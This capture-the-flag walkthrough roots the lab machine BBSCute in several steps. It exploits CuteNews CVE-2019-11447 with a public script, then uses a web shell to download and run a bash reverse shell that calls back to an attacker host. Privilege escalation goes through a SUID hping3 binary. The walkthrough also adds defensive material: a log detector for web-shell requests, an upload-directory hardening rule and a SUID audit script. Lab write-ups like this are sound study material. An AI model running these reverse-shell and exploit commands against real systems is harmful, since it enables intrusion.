This is a walkthrough of the machine BBSCute from OffSec's Proving Grounds Play labs.

Machine information:

  • Level: Easy
  • Community rating: Intermediate
  • Flags: 2
  • OS: Linux
  • Vector: Webapp, local

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting off with an Nmap scan, we discover the following open ports:

  • 22 - SSH
  • 80/88 - HTTP
  • 110/995 - POP3

Webapp

Enumerating the web application on port 80 using gobuster, we discover the page /index.php.

gobuster dir -u http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 64 -x php,txt

Navigating to /index.php, we discover that CuteNews 2.1.2 is running.

Initial access

CuteNews 2.1.2 is vulnerable to CVE-2019-11447. Searching for PoCs, we find this GitHub repository.

We download the Python script and take a closer look:

wget https://raw.githubusercontent.com/thewhiteh4t/cve-2019-11447/refs/heads/main/cve-2019-11447.py

The script requires a username and password, therefore we have to pivot back to the web application and register an account.

After trying to register, however, we run into a problem: a captcha is required, but it is never displayed:

Looking at the page source of /index.php?register, we find a reference to /captcha.php.

We can navigate to /captcha.php, and use the code from this page to register an account.

/captcha.php (for demonstration purposes, captcha is dynamic...)

With a valid account in hand, we will run the exploit again:

python3 cve-2019-11447.py http://<IP>/index.php <USERNAME> <PASSWORD>

Now, we have a web shell on the target, which we can use to obtain a reverse shell:

  • Create a shell.sh script
#!/bin/bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

  • Start a web server on our attack box
python3 -m http.server 80

  • Use the web shell to download our script
/uploads/avatar_test_4706.php?cmd=wget http://<IP>/shell.sh -O /tmp/shell.sh

  • Start a netcat listener on our attack box
nc -lvnp <PORT>

  • Use the web shell to execute the script
/uploads/avatar_test_4706.php?cmd=bash /tmp/shell.sh

We receive a shell as www-data, and can read the first local.txt flag.
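From the defender's side, the trail this step leaves is easy to spot: a PHP file being requested from the avatar upload directory, with a command-style query parameter. The following is an added example (not part of the original writeup or of CuteNews) that parses constructed Apache combined-format access log lines and flags exactly that pattern; the log lines, the parameter names and the upload path are assumptions modelled on the box.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not taken from the box).
SAMPLE_LOG = """\
10.10.14.5 - - [12/Jan/2024:10:01:02 +0000] "GET /index.php?register HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Jan/2024:10:01:40 +0000] "POST /index.php?mod=main&opt=personal HTTP/1.1" 302 0 "-" "python-requests/2.31"
10.10.14.5 - - [12/Jan/2024:10:02:11 +0000] "GET /uploads/avatar_test_4706.php?cmd=id HTTP/1.1" 200 57 "-" "python-requests/2.31"
10.10.14.5 - - [12/Jan/2024:10:02:30 +0000] "GET /uploads/avatar_test_4706.php?cmd=wget%20http://10.10.14.5/shell.sh%20-O%20/tmp/shell.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.9 - - [12/Jan/2024:10:03:00 +0000] "GET /uploads/avatar_alice_12.jpg HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

UPLOAD_DIR = "/uploads/"                                  # assumed avatar upload path
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")         # nothing here should ever execute
SHELL_PARAMS = {"cmd", "c", "exec", "command"}            # assumed web-shell parameter names


def classify(line):
    """Return a finding dict for a suspicious request, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = parts.path
    findings = []
    # Any server-side script under the upload directory is a red flag on its own.
    if path.startswith(UPLOAD_DIR) and path.lower().endswith(SCRIPT_EXT):
        findings.append("script_in_upload_dir")
        # A command-style parameter on top of that is the web shell being driven.
        if SHELL_PARAMS & set(parse_qs(parts.query)):
            findings.append("command_parameter")
    if not findings:
        return None
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "path": path,
        "query": parts.query,
        "status": int(m["status"]),
        "findings": findings,
    }


def scan(log_text):
    """Run classify() over every line and collect the hits in log order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["path"], ",".join(hit["findings"]))
```

Running it against the constructed log reports the two `avatar_test_4706.php?cmd=` requests and ignores the legitimate `.jpg` avatar. The matching mitigation is to deny script execution under the upload directory in the web server configuration (for Apache 2.4, a `<Directory>` block for the uploads path containing `<FilesMatch "\.ph(p|tml|ar)$"> Require all denied </FilesMatch>`), so an uploaded avatar can never be served as PHP even if the application's upload filter is bypassed.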

Privilege escalation

Before proceeding, we need to upgrade our shell to a proper TTY by running:

python3 -c 'import pty;pty.spawn("/bin/bash")'

The following steps will fail if you skip this.

Using manual enumeration to look for executables with the SUID bit set, we find /usr/sbin/hping3:

find / -perm -u=s -type f 2>/dev/null

We can abuse this to escalate privileges by launching hping3, which drops us into its interactive prompt, and spawning a shell from there. This provides us with a root shell in which we can finally read the second proof.txt flag:

/usr/sbin/hping3

/bin/sh -p (typed at the hping3 prompt)
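The root cause here is a non-standard SUID binary that nobody noticed. As an added example (not part of the original writeup), the script below does what an administrator should do on a schedule: collect every SUID regular file with `os.walk` and `os.lstat`, compare it with a baseline of binaries expected on a clean install, and print the `chmod u-s` command that removes the bit from anything unexpected. The baseline set is an assumption for illustration; generate your own from a freshly built host. The sample listing is constructed to mirror this box.

```python
import os
import stat

# Assumed baseline of SUID binaries on a stock Debian-style install.
# Replace this with a listing taken from a clean build of your own image.
BASELINE_SUID = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/fusermount",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Pseudo-filesystems that contain no real binaries and only slow the walk down.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def is_suid(mode):
    """True for a regular file whose SUID bit is set (st_mode from os.lstat)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def collect_suid(root="/"):
    """Walk the filesystem from root and return sorted paths of SUID regular files.

    Equivalent to: find / -perm -u=s -type f 2>/dev/null
    """
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # Prune pseudo-filesystems in place so os.walk never descends into them.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)        # lstat: do not follow symlinks
            except OSError:
                continue
            if is_suid(st.st_mode):
                found.append(path)
    return sorted(found)


def audit(suid_paths, baseline=BASELINE_SUID):
    """Return the SUID paths that are not in the expected baseline."""
    return sorted(p for p in suid_paths if p not in baseline)


def remediation(unexpected):
    """Commands that strip the SUID bit from each unexpected binary."""
    return [f"chmod u-s {p}" for p in unexpected]


# Constructed listing, as collect_suid() might return it on a host like BBSCute.
SAMPLE_SUID = [
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/mount",
    "/usr/bin/newgrp", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo",
    "/usr/bin/umount", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign", "/usr/sbin/hping3",
]


if __name__ == "__main__":
    # Use collect_suid("/") on a real host; the constructed sample keeps this runnable anywhere.
    unexpected = audit(SAMPLE_SUID)
    for line in remediation(unexpected):
        print(line)
```

On the constructed sample the only unexpected entry is /usr/sbin/hping3, and the script prints `chmod u-s /usr/sbin/hping3`. Beyond removing the bit, a binary that needs raw sockets (as hping3 does) should be given the `cap_net_raw` file capability with `setcap` instead of SUID root, so that a compromise of the tool does not hand over a full root shell.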
